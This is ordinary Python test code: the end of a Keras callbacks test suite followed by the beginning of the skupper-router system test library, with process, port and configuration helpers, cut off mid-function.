np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
@keras_test
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
@keras_test
def test_EarlyStopping_patience():
class DummyModel(object):
def __init__(self):
self.stop_training = False
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040, 0.1019]
# Should stop after epoch 3, as the loss has not improved after patience=2 epochs.
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
assert epochs_trained == 3
@keras_test
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
    assert abs(float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
@keras_test
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
@keras_test
def test_CSVLogger(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'log.tsv')
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
import re
with open(filepath) as csvfile:
output = " ".join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=0), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data should raise ValueError if histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=1), epochs=3)
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator with validation data generator should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=data_generator(False),
validation_steps=1,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_multi_input_output(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2,
[y_train[i * batch_size: (i + 1) * batch_size]] * 2)
else:
yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2,
[y_test[i * batch_size: (i + 1) * batch_size]] * 2)
i += 1
i = i % max_batch_index
inp1 = Input((input_dim,))
inp2 = Input((input_dim,))
inp = add([inp1, inp2])
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output1 = Dense(num_classes, activation='softmax')(hidden)
output2 = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=[inp1, inp2], outputs=[output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_convnet(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
input_shape = (16, 16, 3)
(x_train, y_train), (x_test, y_test) = get_test_data(num_train=500,
num_test=200,
input_shape=input_shape,
classification=True,
num_classes=num_classes)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = Sequential([
Conv2D(filters=8, kernel_size=3,
activation='relu',
input_shape=input_shape),
MaxPooling2D(pool_size=2),
Conv2D(filters=4, kernel_size=(3, 3),
activation='relu', padding='same'),
GlobalAveragePooling2D(),
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
batch_size=16)
cbks = [tsb]
model.summary()
history = model.fit(x_train, y_train, epochs=2, batch_size=16,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit_generator(data_generator(True), len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
@keras_test
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires TensorFlow backend")
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
if __name__ == '__main__':
pytest.main([__file__])
|
system_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""System test library, provides tools for tests that start multiple processes,
with special support for skupper-router processes.
Features:
- Create separate directories for each test.
- Save logs, sub-process output, core files etc.
- Automated clean-up after tests: kill sub-processes etc.
- Tools to manipulate router configuration files.
- Sundry other tools.
"""
import fcntl
import pathlib
from typing import Callable, TextIO
import errno
import logging
import sys
import time
from typing import List, Optional, Tuple
import __main__
import os
import random
import re
import shutil
import socket
import subprocess
from copy import copy
from datetime import datetime
from subprocess import PIPE, STDOUT
import queue as Queue
from threading import Thread
from threading import Event
import json
import uuid
import unittest
import proton
import proton.utils
from proton import Message
from proton import Delivery
from proton.handlers import MessagingHandler
from proton.reactor import AtLeastOnce, Container
from proton.reactor import AtMostOnce
from skupper_router.management.client import Node
from skupper_router.management.error import NotFoundStatus
# Optional modules
MISSING_MODULES = []
try:
import qpidtoollibs
except ImportError as err:
qpidtoollibs = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
try:
import qpid_messaging as qm
except ImportError as err:
qm = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
def find_exe(program):
"""Find an executable in the system PATH"""
def is_exe(fpath):
"""True if fpath is executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
mydir = os.path.split(program)[0]
if mydir:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
# The directory where this module lives. Used to locate static configuration files etc.
DIR = os.path.dirname(__file__)
def _check_requirements():
"""If requirements are missing, return a message, else return empty string."""
missing = MISSING_MODULES
required_exes = ['skrouterd']
missing += ["No exectuable %s" % e for e in required_exes if not find_exe(e)]
if missing:
return "%s: %s" % (__name__, ", ".join(missing))
MISSING_REQUIREMENTS = _check_requirements()
def retry_delay(deadline, delay, max_delay):
"""For internal use in retry. Sleep as required
and return the new delay or None if retry should time out"""
remaining = deadline - time.time()
if remaining <= 0:
return None
time.sleep(min(delay, remaining))
return min(delay * 2, max_delay)
# Valgrind significantly slows down the response time of the router, so use a
# long default timeout
TIMEOUT = float(os.environ.get("QPID_SYSTEM_TEST_TIMEOUT", 60))
def retry(function: Callable[[], bool], timeout: float = TIMEOUT, delay: float = .001, max_delay: float = 1):
"""Call function until it returns a true value or timeout expires.
Double the delay for each retry up to max_delay.
Returns what function returns or None if timeout expires.
"""
deadline = time.time() + timeout
while True:
ret = function()
if ret:
return ret
else:
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
return None
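# Illustrative usage of retry(): poll a condition until it holds or the timeout
# expires (the router object here is schematic).
#
#   assert retry(lambda: router.is_connected(port), timeout=TIMEOUT), \
#       "port %s never connected" % port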
def retry_exception(function, timeout=TIMEOUT, delay=.001, max_delay=1, exception_test=None):
"""Call function until it returns without exception or timeout expires.
Double the delay for each retry up to max_delay.
Calls exception_test with any exception raised by function, exception_test
may itself raise an exception to terminate the retry.
Returns what function returns if it succeeds before timeout.
Raises last exception raised by function on timeout.
"""
deadline = time.time() + timeout
while True:
try:
return function()
except Exception as e: # pylint: disable=broad-except
if exception_test:
exception_test(e)
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
raise
def get_local_host_socket(socket_address_family='IPv4'):
if socket_address_family == 'IPv4':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
elif socket_address_family == 'IPv6':
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
host = '::1'
return s, host
def check_port_refuses_connection(port, socket_address_family='IPv4'):
"""Return true if connecting to host:port gives 'connection refused'."""
s, host = get_local_host_socket(socket_address_family)
try:
s.connect((host, port))
except OSError as e:
return e.errno == errno.ECONNREFUSED
finally:
s.close()
return False
def check_port_permits_binding(port, socket_address_family='IPv4'):
"""Return true if binding to the port succeeds."""
s, _ = get_local_host_socket(socket_address_family)
host = ""
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # so that followup binders are not blocked
s.bind((host, port))
except OSError:
return False
finally:
s.close()
return True
def is_port_available(port, socket_address_family='IPv4'):
"""Return true if a new server will be able to bind to the port."""
return (check_port_refuses_connection(port, socket_address_family)
and check_port_permits_binding(port, socket_address_family))
def wait_port(port, socket_address_family='IPv4', **retry_kwargs):
"""Wait up to timeout for port (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
def check(e):
"""Only retry on connection refused"""
if not isinstance(e, socket.error) or not e.errno == errno.ECONNREFUSED:
raise
host = None
def connect():
# macOS gives EINVAL for all connection attempts after a ECONNREFUSED
# man 3 connect: "If connect() fails, the state of the socket is unspecified. [...]"
s, host = get_local_host_socket(socket_address_family)
try:
s.connect((host, port))
finally:
s.close()
try:
retry_exception(connect, exception_test=check, **retry_kwargs)
except Exception as e:
raise Exception("wait_port timeout on host %s port %s: %s" % (host, port, e))
def wait_ports(ports, **retry_kwargs):
"""Wait up to timeout for all ports (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
for port, socket_address_family in ports.items():
wait_port(port=port, socket_address_family=socket_address_family, **retry_kwargs)
def message(**properties):
"""Convenience to create a proton.Message with properties set"""
m = Message()
for name, value in properties.items():
getattr(m, name) # Raise exception if not a valid message attribute.
setattr(m, name, value)
return m
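# Illustrative usage: the getattr() guard above makes message() fail fast on
# misspelled attribute names.
#
#   msg = message(address="examples", body="hello", durable=True)
#   # message(adress="examples")  # typo -> AttributeError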
def skip_test_in_ci(environment_var):
env_var = os.environ.get(environment_var)
if env_var is not None:
if env_var.lower() in ['true', '1', 't', 'y', 'yes']:
return True
return False
class Process(subprocess.Popen):
"""
Popen that can be torn down at the end of a TestCase and stores its output.
"""
# Expected states of a Process at teardown
RUNNING = -1 # Still running
EXIT_OK = 0 # Exit status 0
EXIT_FAIL = 1 # Exit status 1
unique_id = 0
@classmethod
def unique(cls, name):
cls.unique_id += 1
return "%s-%s" % (name, cls.unique_id)
def __init__(self, args, name=None, expect=EXIT_OK, **kwargs):
"""
Takes same arguments as subprocess.Popen. Some additional/special args:
@param expect: Raise error if process status not as expected at end of test:
L{RUNNING} - expect still running.
L{EXIT_OK} - expect process to have terminated with 0 exit status.
L{EXIT_FAIL} - expect process to have terminated with exit status 1.
integer - expected return code
@keyword stdout: Defaults to the file name+".out"
        @keyword stderr: Defaults to the same as stdout
"""
self.name = name or os.path.basename(args[0])
self.args = args
self.expect = expect
self.outdir = os.getcwd()
self.outfile = os.path.abspath(self.unique(self.name))
self.torndown = False
with open(self.outfile + '.out', 'w') as out:
kwargs.setdefault('stdout', out)
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
super(Process, self).__init__(args, **kwargs)
with open(self.outfile + '.cmd', 'w') as f:
f.write("%s\npid=%s\n" % (' '.join(args), self.pid))
except Exception as e:
raise Exception("subprocess.Popen(%s, %s) failed: %s: %s" %
(args, kwargs, type(e).__name__, e))
def assert_running(self):
"""Assert that the process is still running"""
assert self.poll() is None, "%s: exited" % ' '.join(self.args)
def teardown(self):
"""Check process status and stop the process if necessary"""
if self.torndown:
return
self.torndown = True
def error(msg):
with open(self.outfile + '.out') as f:
raise RuntimeError("Process %s error: %s\n%s\n%s\n>>>>\n%s<<<<" % (
self.pid, msg, ' '.join(self.args),
self.outfile + '.cmd', f.read()))
status = self.poll()
if status is None: # Still running
self.terminate()
if self.expect is not None and self.expect != Process.RUNNING:
error("still running")
self.expect = 0 # Expect clean exit after terminate
status = self.wait()
if self.expect is not None and self.expect != status:
error("exit code %s, expected %s" % (status, self.expect))
class Config:
"""Base class for configuration objects that provide a convenient
way to create content for configuration files."""
def write(self, name, suffix=".conf"):
"""Write the config object to file name.suffix. Returns name.suffix."""
name = name + suffix
with open(name, 'w') as f:
f.write(str(self))
return name
class HttpServer(Process):
def __init__(self, args, name=None, expect=Process.RUNNING):
super(HttpServer, self).__init__(args, name=name, expect=expect)
class Http2Server(HttpServer):
"""A HTTP2 Server that will respond to requests made via the router."""
def __init__(self, name=None, listen_port=None, wait=True,
perform_teardown=True, cl_args=None,
server_file=None,
expect=Process.RUNNING):
self.name = name
self.listen_port = listen_port
self.ports_family = {self.listen_port: 'IPv4'}
self.cl_args = cl_args
self.perform_teardown = perform_teardown
self.server_file = server_file
self._wait_ready = False
self.args = [sys.executable, os.path.join(os.path.dirname(os.path.abspath(__file__)), self.server_file)]
if self.cl_args:
self.args += self.cl_args
super(Http2Server, self).__init__(self.args, name=name, expect=expect)
if wait:
self.wait_ready()
def wait_ready(self, **retry_kwargs):
"""
Wait for ports to be ready
"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
class Qdrouterd(Process):
"""Run a Qpid Dispatch Router Daemon"""
class Config(list, Config): # type: ignore[misc] # Cannot resolve name "Config" (possible cyclic definition) # mypy#10958
"""
A router configuration.
The Config class is a list of tuples in the following format:
[ ('section-name', {attribute-map}), ...]
where attribute-map is a dictionary of key+value pairs. Key is an
attribute name (string), value can be any of [scalar | string | dict]
When written to a configuration file to be loaded by the router:
        o) there is no ':' between the section-name and the opening brace
o) attribute keys are separated by a ":" from their values
o) attribute values that are scalar or string follow the ":" on the
same line.
o) attribute values do not have trailing commas
o) The section-name and attribute keywords are written
without enclosing quotes
o) string type attribute values are not enclosed in quotes
o) attribute values of type dict are written in their JSON representation.
Fills in some default values automatically, see Qdrouterd.DEFAULTS
"""
DEFAULTS = {
'listener': {'host': '0.0.0.0', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120',
'authenticatePeer': 'no', 'role': 'normal'},
'connector': {'host': '127.0.0.1', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120'},
'router': {'mode': 'standalone', 'id': 'QDR'}
}
def sections(self, name):
"""Return list of sections named name"""
return [p for n, p in self if n == name]
@property
def router_id(self): return self.sections("router")[0]["id"]
def defaults(self):
"""Fill in default values in gconfiguration"""
for name, props in self:
if name in Qdrouterd.Config.DEFAULTS:
for n, p in Qdrouterd.Config.DEFAULTS[name].items():
props.setdefault(n, p)
def __str__(self):
"""Generate config file content. Calls default() first."""
def tabs(level):
if level:
return " " * level
return ""
def value(item, level):
if isinstance(item, dict):
result = "{\n"
result += "".join(["%s%s: %s,\n" % (tabs(level + 1),
json.dumps(k),
json.dumps(v))
for k, v in item.items()])
result += "%s}" % tabs(level)
return result
return "%s" % item
def attributes(e, level):
assert(isinstance(e, dict))
# k = attribute name
# v = string | scalar | dict
return "".join(["%s%s: %s\n" % (tabs(level),
k,
value(v, level + 1))
for k, v in e.items()])
self.defaults()
# top level list of tuples ('section-name', dict)
return "".join(["%s {\n%s}\n" % (n, attributes(p, 1)) for n, p in self])
def __init__(self, name=None, config=Config(), pyinclude=None, wait=True,
perform_teardown=True, cl_args=None, expect=Process.RUNNING):
"""
        @param name: name used for output files; defaults to the id from config.
@param config: router configuration
@keyword wait: wait for router to be ready (call self.wait_ready())
"""
cl_args = cl_args or []
self.config = copy(config)
self.perform_teardown = perform_teardown
if not name:
name = self.config.router_id
assert name
# setup log and debug dump files
self.dumpfile = os.path.abspath('%s-qddebug.txt' % name)
self.config.sections('router')[0]['debugDumpFile'] = self.dumpfile
default_log = [l for l in config if (l[0] == 'log' and l[1]['module'] == 'DEFAULT')]
if not default_log:
self.logfile = "%s.log" % name
config.append(
('log', {'module': 'DEFAULT', 'enable': 'trace+',
'includeSource': 'true', 'outputFile': self.logfile}))
else:
self.logfile = default_log[0][1].get('outputFile')
args = ['skrouterd', '-c', config.write(name)] + cl_args
env_home = os.environ.get('QPID_DISPATCH_HOME')
if pyinclude:
args += ['-I', pyinclude]
elif env_home:
args += ['-I', os.path.join(env_home, 'python')]
args = os.environ.get('QPID_DISPATCH_RUNNER', '').split() + args
super(Qdrouterd, self).__init__(args, name=name, expect=expect)
self._management = None
self._wait_ready = False
if wait:
self.wait_ready()
@property
def management(self):
"""Return a management agent proxy for this router"""
if not self._management:
self._management = Node.connect(self.addresses[0], timeout=TIMEOUT)
return self._management
def teardown(self):
if self._management:
try:
self._management.close()
except:
pass
self._management = None
if not self.perform_teardown:
return
teardown_exc = None
try:
super(Qdrouterd, self).teardown()
except Exception as exc:
# re-raise _after_ dumping all the state we can
teardown_exc = exc
def check_output_file(filename, description):
"""check router's debug dump file for anything interesting (should be
empty) and dump it to stderr for perusal by organic lifeforms"""
try:
if os.stat(filename).st_size > 0:
with open(filename) as f:
